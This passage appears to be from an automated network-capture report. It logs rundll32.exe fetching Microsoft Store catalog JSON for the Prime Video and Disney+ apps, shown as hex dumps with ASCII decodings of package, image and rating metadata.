                                                                                                                                                                                    2023-01-05 07:59:09 UTC15203INData Raw: 22 69 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 63 6f 6e 66 69 72 6d 41 70 70 43 6c 6f 73 65 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 35 33 36 34 37 37 39 38 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 33 39 31 39 30 35 32 38 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 4d 73 69 78 42 75 6e 64 6c 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 41 6d 61 7a 6f 6e 56 69 64 65 6f 2e 50 72 69 6d 65 56 69 64 65 6f 5f 70 77 62 6a 39 76 76 65 63 6a 68 37 6a 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75
                                                                                                                                                                                    Data Ascii: "internetClient","confirmAppClose"],"ExperienceIds":[],"MaxDownloadSizeInBytes":53647798,"MaxInstallSizeInBytes":39190528,"PackageFormat":"MsixBundle","PackageFamilyName":"AmazonVideo.PrimeVideo_pwbj9vvecjh7j","MainPackageFamilyNameForDlc":null,"PackageFu
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15204INData Raw: 39 37 30 35 34 34 38 32 31 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 30 39 33 31 32 32 32 35 32 38 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 33 7d 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f 72 79 2e 66 69 72 73 74 5c 22 3a 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e 64 5c 22 3a 5c 22 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 22 2c 5c 22 6f 70 74 4f 75 74 2e 62 61 63 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 74 72 75 65 2c 5c 22 6f 70 74 4f 75 74 2e 72 65 6d 6f 76 65 61 62 6c 65 4d 65 64 69 61 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32 5c 22 3a 7b 5c 22 61 67 65 52 61
                                                                                                                                                                                    Data Ascii: 970544821,\"platform.minVersion\":2814750931222528,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Entertainment\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRa
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15205INData Raw: 46 75 6c 66 69 6c 6c 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 52 53 42 30 42 50 4c 5a 56 51 57 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70
                                                                                                                                                                                    Data Ascii: Fulfill"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"9RSB0BPLZVQW","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Desktop
                                                                                                                                                                                    2023-01-05 07:59:09 UTC15206INData Raw: 77 73 2e 4d 6f 62 69 6c 65 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 54 65 61 6d 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 48 6f 6c 6f 67 72 61 70 68 69 63 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34
                                                                                                                                                                                    Data Ascii: ws.Mobile"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Team"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Xbox"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Holographic"},{"MaxVersion":214748364


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    52192.168.2.44988620.82.154.241443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15207OUTGET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Disney.37853FC22B2CE_6rarf9sa4v8jt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    User-Agent: Install Service
                                                                                                                                                                                    MS-CV: gh25C67HW06WdAJn.0.2.4
                                                                                                                                                                                    Host: displaycatalog.mp.microsoft.com
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15207INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 61635
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:10 GMT
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    Vary: Authorization
                                                                                                                                                                                    MS-CorrelationId: b76fdfd0-562a-46e9-b502-152df4c2dacf
                                                                                                                                                                                    MS-RequestId: 7a535c85-c72d-4589-892d-481349725e32
                                                                                                                                                                                    MS-CV: gh25C67HW06WdAJn.0.2.4.4008884850.1249877107.0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    MS-ServerId: b4ddc6-25xvs
                                                                                                                                                                                    MS-DocumentVersions: 9NXQXXLFST89|2565
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15208INData Raw: 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 4e 58 51 58 58 4c 46 53 54 38 39 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 31 32 2d 32 31 54 31 37 3a 33 34 3a 31 31 2e 33 37 39 34 36 35 39 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 31 36 36 34 31 31 37 39 39 37 30 30 31 33 39 36 35 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43
                                                                                                                                                                                    Data Ascii: {"BigIds":["9NXQXXLFST89"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-12-21T17:34:11.3794659Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3016641179970013965","EISListingIdentifier":null,"BackgroundColor":"transparent","C
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15211INData Raw: 37 2d 38 39 34 32 2d 36 33 66 31 39 35 62 33 34 32 38 66 22 2c 22 57 69 64 74 68 22 3a 36 36 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 30 30 35 37 37 31 32 33 39 33 35 32 34 37 36 37 34 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 36 30 32 34 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 38 38 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48
                                                                                                                                                                                    Data Ascii: 7-8942-63f195b3428f","Width":66},{"FileId":"3000577123935247674","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"","FileSizeInBytes":6024,"ForegroundColor":"","Height":88,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSH
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15215INData Raw: 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 37 39 35 34 31 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 33 30 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 33 38 30 6c 77 36 43 53 43 31 58 33 69 45 42 72 4c 4e 75 71 66 68 35 2b 4c 63 41 43 74 2f 70 37 46 72 42 52 46 79 77 65 76 70 38 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 35 32 37 30 33 2e 31 34 34 39 35 33 31 31 38 34 37 31 32 34
                                                                                                                                                                                    Data Ascii: ption":"","FileSizeInBytes":79541,"ForegroundColor":"","Height":300,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256Hash":"380lw6CSC1X3iEBrLNuqfh5+LcACt/p7FrBRFywevp8=","Uri":"//store-images.s-microsoft.com/image/apps.52703.14495311847124
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15219INData Raw: 34 32 63 30 37 35 30 2e 63 31 38 65 34 66 31 61 2d 31 38 61 36 2d 34 38 34 61 2d 62 63 65 37 2d 35 65 31 66 31 63 61 34 33 63 66 61 22 2c 22 57 69 64 74 68 22 3a 33 38 34 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 35 32 38 32 39 38 31 39 35 36 38 36 34 33 38 36 30 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 52 6f 62 75 73 74 20 70 61 72 65 6e 74 61 6c 20 63 6f 6e 74 72 6f 6c 73 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 35 37 33 39 32 35 30 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 32 31 36 30 2c 22 49 6d 61 67
                                                                                                                                                                                    Data Ascii: 42c0750.c18e4f1a-18a6-484a-bce7-5e1f1ca43cfa","Width":3840},{"FileId":"3052829819568643860","EISListingIdentifier":null,"BackgroundColor":"transparent","Caption":"Robust parental controls","FileSizeInBytes":5739250,"ForegroundColor":"","Height":2160,"Imag
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15223INData Raw: 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 33 31 36 32 39 2e 31 34 34 39 35 33 31 31 38 34 37 31 32 34 31 37 30 2e 36 63 66 32 34 34 64 31 2d 32 38 64 38 2d 34 38 66 39 2d 62 66 63 32 2d 38 32 35 66 30 34 32 63 30 37 35 30 2e 37 64 31 66 31 61 32 35 2d 63 61 30 37 2d 34 66 32 38 2d 38 38 66 62 2d 66 39 66 37 65 34 37 64 62 33 66 32 22 2c 22 57 69 64 74 68 22 3a 31 39 32 30 7d 2c 22 54 72 61 69 6c 65 72 49 64 22 3a 6e 75 6c 6c 2c 22 53 6f 72 74 4f 72 64 65 72 22 3a 31 7d 5d 2c 22 50 72 6f 64 75 63 74 44 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 44 69 73 6e 65 79 2b 20 69 73 20 74 68 65 20 73 74 72 65 61 6d 69 6e 67 20 68 6f 6d 65 20 6f 66 20 79 6f 75 72 20 66 61 76 6f 72 69 74 65 20 73 74 6f 72 69 65 73 2e 20 57 69 74 68
                                                                                                                                                                                    Data Ascii: s-microsoft.com/image/apps.31629.14495311847124170.6cf244d1-28d8-48f9-bfc2-825f042c0750.7d1f1a25-ca07-4f28-88fb-f9f7e47db3f2","Width":1920},"TrailerId":null,"SortOrder":1}],"ProductDescription":"Disney+ is the streaming home of your favorite stories. With
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15227INData Raw: 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 50 72 6f 64 75 63 74 54 79 70 65 22 3a 22 41 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 56 61 6c 69 64 61 74 69 6f 6e 44 61 74 61 22 3a 7b 22 50 61 73 73 65 64 56 61 6c 69 64 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 52 65 76 69 73 69 6f 6e 49 64 22 3a 22 32 30 32 32 2d 31 32 2d 32 31 54 31 37 3a 34 31 3a 34 36 2e 33 35 38 32 35 32 35 5a 7c 7c 2e 7c 7c 31 64 35 61 62 30 35 33 2d 65 31 37 66 2d 34 36 32 30 2d 38 36 38 30 2d 33 35 36 37 39 65 65 65 62 33 34 38 7c 7c 31 31 35 32 39 32 31 35 30 35 36 39 35 36 39 39 38 36 36 7c 7c 4e 75 6c 6c 7c 7c 66 75 6c 6c 72 65 6c 65 61 73 65 22 2c 22 56 61 6c 69 64 61 74 69 6f 6e 52 65 73 75 6c 74 55 72 69 22 3a 22 22 7d 2c 22 4d 65 72 63 68 61 6e 64 69 7a 69 6e 67 54 61 67 73 22 3a
                                                                                                                                                                                    Data Ascii: kuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-12-21T17:41:46.3582525Z||.||1d5ab053-e17f-4620-8680-35679eeeb348||1152921505695699866||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15231INData Raw: 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 31 2e 34 34 2e 32 2e 30 5f 78 36 34 5f 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 34 65 37 32 33 32 33 32 2d 37 62 36 30 2d 34 66 37 32 2d 39 39 32 35 2d 39 30 32 66
                                                                                                                                                                                    Data Ascii: 536,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"Disney.37853FC22B2CE_1.44.2.0_x64__6rarf9sa4v8jt\",\"content.productId\":\"4e723232-7b60-4f72-9925-902f
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15235INData Raw: 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 33 7d 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f 72 79 2e 66 69 72 73 74 5c 22 3a 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e 64 5c 22 3a 5c 22 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 22 2c 5c 22 6f 70 74 4f 75 74 2e 62 61 63 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 66 61 6c 73 65 2c 5c 22 6f 70 74 4f 75 74 2e 72 65 6d 6f 76 65 61 62 6c 65 4d 65 64 69 61 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32 5c 22 3a 7b 5c 22 61 67 65 52 61 74 69
                                                                                                                                                                                    Data Ascii: 977536,\"platform.minVersion\":2814751014977536,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Entertainment\",\"optOut.backupRestore\":false,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRati
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15239INData Raw: 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 32 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 33 7d 5d 7d 7d 22 2c 22 50 61 63 6b 61 67 65 44 6f 77 6e 6c 6f 61 64 55 72 69 73 22 3a 6e 75 6c 6c 2c 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 58 51 58 58 4c 46 53 54 38 39 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 36 62 65 37 31 66 36 31 2d 36 35 64 64 2d 34 37 32 31 2d 61 61 62 65 2d 38 63 34 36 34 36 37 33 37 33 32 37 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 32 32 65 30 63 65 37 66 2d 34 32 37 61 2d 34 30 66 61 2d 62 66 61 36 2d 30 64 65 37 62
                                                                                                                                                                                    Data Ascii: 8,\"systemId\":16},{\"level\":72,\"systemId\":15},{\"level\":67,\"systemId\":13}]}}","PackageDownloadUris":null,"FulfillmentData":{"ProductId":"9NXQXXLFST89","WuBundleId":"6be71f61-65dd-4721-aabe-8c4646737327","WuCategoryId":"22e0ce7f-427a-40fa-bfa6-0de7b
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15240INData Raw: 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 70 72 69 76 61 74 65 4e 65 74 77 6f 72 6b 43 6c 69 65 6e 74 53 65 72 76 65 72 22 2c 22 68 65 76 63 50 6c 61 79 62 61 63 6b 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 35 30 32 37 34 32 35 39 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 32 37 39 35 30 38 34 38 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 45 4d 73 69 78 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44
                                                                                                                                                                                    Data Ascii: nternetClient","privateNetworkClientServer","hevcPlayback"],"ExperienceIds":[],"MaxDownloadSizeInBytes":150274259,"MaxInstallSizeInBytes":127950848,"PackageFormat":"EMsix","PackageFamilyName":"Disney.37853FC22B2CE_6rarf9sa4v8jt","MainPackageFamilyNameForD
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15241INData Raw: 6c 73 65 2c 5c 22 6f 70 74 4f 75 74 2e 72 65 6d 6f 76 65 61 62 6c 65 4d 65 64 69 61 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32 5c 22 3a 7b 5c 22 61 67 65 52 61 74 69 6e 67 5c 22 3a 33 2c 5c 22 6f 70 74 4f 75 74 2e 44 56 52 5c 22 3a 74 72 75 65 2c 5c 22 74 68 69 72 64 50 61 72 74 79 41 70 70 52 61 74 69 6e 67 73 5c 22 3a 5b 7b 5c 22 6c 65 76 65 6c 5c 22 3a 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 38 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 35 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 38 2c 5c 22 73 79 73 74 65 6d
                                                                                                                                                                                    Data Ascii: lse,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":true,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"systemId\":5},{\"level\":51,\"systemId\":12},{\"level\":29,\"systemId\":9},{\"level\":78,\"system
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15242INData Raw: 72 66 39 73 61 34 76 38 6a 74 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 65 35 35 31 62 63 34 32 2d 39 61 64 36 2d 34 65 61 65 2d 39 39 39 66 2d 39 36 39 32 37 61 66 37 37 36 66 35 2d 58 38 36 22 2c 22 50 61 63 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 30 31 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 22 7d 2c 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34
                                                                                                                                                                                    Data Ascii: rf9sa4v8jt","PackageId":"e551bc42-9ad6-4eae-999f-96927af776f5-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814751014977536,"MinVersion":2814751014977536,"PlatformName":"Windows.Xbox"},{"MaxTested":2814751014977536,"MinVersion":2814751014
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15243INData Raw: 3a 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 38 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 35 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 32 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 33 7d 5d 7d 7d 22 2c 22 50 61 63 6b 61 67 65 44 6f 77 6e 6c 6f 61 64 55 72 69 73 22 3a 6e 75 6c 6c 2c 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50
                                                                                                                                                                                    Data Ascii: :9,\"systemId\":3},{\"level\":81,\"systemId\":5},{\"level\":51,\"systemId\":12},{\"level\":29,\"systemId\":9},{\"level\":78,\"systemId\":16},{\"level\":72,\"systemId\":15},{\"level\":67,\"systemId\":13}]}}","PackageDownloadUris":null,"FulfillmentData":{"P
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15244INData Raw: 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 31 2e 34 34 2e 32 2e 37 30 5f 78 38 36 5f 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 5c 22 2c 5c 22 63 6f 6e 74 65
                                                                                                                                                                                    Data Ascii: ed":2814751014977536,"MinVersion":2814751014977536,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"Disney.37853FC22B2CE_1.44.2.70_x86__6rarf9sa4v8jt\",\"conte
